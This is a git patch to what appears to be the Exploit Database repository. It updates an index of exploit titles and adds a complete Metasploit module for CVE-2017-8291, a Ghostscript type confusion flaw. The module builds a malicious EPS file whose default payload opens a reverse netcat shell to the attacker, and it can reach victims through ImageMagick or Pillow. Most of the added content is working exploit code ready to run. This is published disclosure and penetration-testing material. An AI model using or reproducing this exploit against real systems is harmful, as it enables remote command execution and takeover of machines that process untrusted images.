From 6515e2635658f5584d0ed7e4e4f224813a3700fa Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 3 May 2017 05:01:17 +0000 Subject: [PATCH] DB: 2017-05-03 1 new exploits MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow MySQL < 5.6.35 / < 5.7.17 - Integer Overflow Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit) Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection --- files.csv | 5 ++- platforms/linux/local/41955.rb | 75 ++++++++++++++++++++++++++++++++++ 2 files changed, 78 insertions(+), 2 deletions(-) create mode 100755 platforms/linux/local/41955.rb diff --git a/files.csv b/files.csv index 49ccb4119..21ff47538 100644 --- a/files.csv +++ b/files.csv @@ -5481,7 +5481,7 @@ id,file,description,date,author,platform,type,port 41941,platforms/windows/dos/41941.html,"Microsoft Internet Explorer 11.576.14393.0 - 'CStyleSheetArray::BuildListOfMatchedRules' Memory Corruption",2017-04-27,"Google Security Research",windows,dos,0 41945,platforms/windows/dos/41945.c,"Panda Free Antivirus - 'PSKMAD.sys' Denial of Service",2017-04-29,"Peter Baris",windows,dos,0 41949,platforms/windows/dos/41949.py,"IrfanView 4.44 - Denial of Service",2017-04-29,"Dreivan Orprecio",windows,dos,0 -41954,platforms/multiple/dos/41954.py,"MySQL <= 5.6.35 / <= 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0 +41954,platforms/multiple/dos/41954.py,"MySQL < 5.6.35 / < 5.7.17 - Integer Overflow",2017-05-01,"Rodrigo Marcos",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -8966,6 +8966,7 @@ id,file,description,date,author,platform,type,port 41933,platforms/windows/local/41933.txt,"Realtek Audio Driver 6.0.1.7898 (Windows 10) - Dolby Audio X2 Service Privilege Escalation",2017-04-25,"Google Security Research",windows,local,0 41951,platforms/osx/local/41951.txt,"HideMyAss Pro VPN Client for OS X 2.2.7.0 - Privilege Escalation",2017-05-01,"Han Sahin",osx,local,0 41952,platforms/macos/local/41952.txt,"HideMyAss Pro VPN Client for macOS 3.x - Privilege Escalation",2017-05-01,"Han Sahin",macos,local,0 +41955,platforms/linux/local/41955.rb,"Ghostscript 9.21 - Type Confusion Arbitrary Command Execution (Metasploit)",2017-05-02,Metasploit,linux,local,0 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139 @@ -37803,4 +37804,4 @@ id,file,description,date,author,platform,type,port 41947,platforms/multiple/webapps/41947.txt,"Emby MediaServer 3.2.5 - Password Reset",2017-04-30,LiquidWorm,multiple,webapps,0 41948,platforms/multiple/webapps/41948.txt,"Emby MediaServer 3.2.5 - Directory Traversal",2017-04-30,LiquidWorm,multiple,webapps,0 41950,platforms/linux/webapps/41950.py,"Alerton Webtalk 2.5 / 3.3 - Multiple Vulnerabilities",2017-05-01,"David Tomaschik",linux,webapps,0 -41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 <= 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0 +41953,platforms/php/webapps/41953.txt,"Tuleap Project Wiki 8.3 < 9.6.99.86 - Command Injection",2017-05-01,"Ben Nott",php,webapps,0 diff --git a/platforms/linux/local/41955.rb b/platforms/linux/local/41955.rb new file mode 100755 index 000000000..98c0412a8 --- /dev/null +++ b/platforms/linux/local/41955.rb @@ -0,0 +1,75 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit + + Rank = ExcellentRanking + + include Msf::Exploit::FILEFORMAT + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Ghostscript Type Confusion Arbitrary Command Execution', + 'Description' => %q{ + This module exploits a type confusion vulnerability in Ghostscript that can + be exploited to obtain arbitrary command execution. This vulnerability affects + Ghostscript version 9.21 and earlier and can be exploited through libraries + such as ImageMagick and Pillow. + }, + 'Author' => [ + 'Atlassian Security Team', # Vulnerability discovery + 'hdm' # Metasploit module + ], + 'References' => [ + %w{CVE 2017-8291}, + %w{URL https://bugs.ghostscript.com/show_bug.cgi?id=697808}, + %w{URL http://seclists.org/oss-sec/2017/q2/148}, + %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=04b37bbce174eed24edec7ad5b920eb93db4d47d}, + %w{URL https://git.ghostscript.com/?p=ghostpdl.git;a=commit;h=4f83478c88c2e05d6e8d79ca4557eb039354d2f3} + ], + 'DisclosureDate' => 'Apr 27 2017', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'Privileged' => false, + 'Payload' => { + 'BadChars' => "\x22\x27\x5c)(", # ", ', \, (, and ) + 'Compat' => { + 'PayloadType' => 'cmd cmd_bash', + 'RequiredCmd' => 'generic netcat bash-tcp' + } + }, + 'Targets' => [ + ['EPS file', template: 'msf.eps'] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'cmd/unix/reverse_netcat', + 'LHOST' => Rex::Socket.source_address, + 'DisablePayloadHandler' => false, + 'WfsDelay' => 9001 + } + )) + + register_options([ + OptString.new('FILENAME', [true, 'Output file', 'msf.eps']) + ]) + end + + # Example usage from the bug tracker: + # $ gs -q -dNOPAUSE -dSAFER -sDEVICE=ppmraw -sOutputFile=/dev/null -f exploit2.eps + + def exploit + file_create(template.sub('echo vulnerable > /dev/tty', payload.encoded)) + end + + def template + ::File.read(File.join( + Msf::Config.data_directory, 'exploits', 'CVE-2017-8291', + target[:template] + )) + end + +end \ No newline at end of file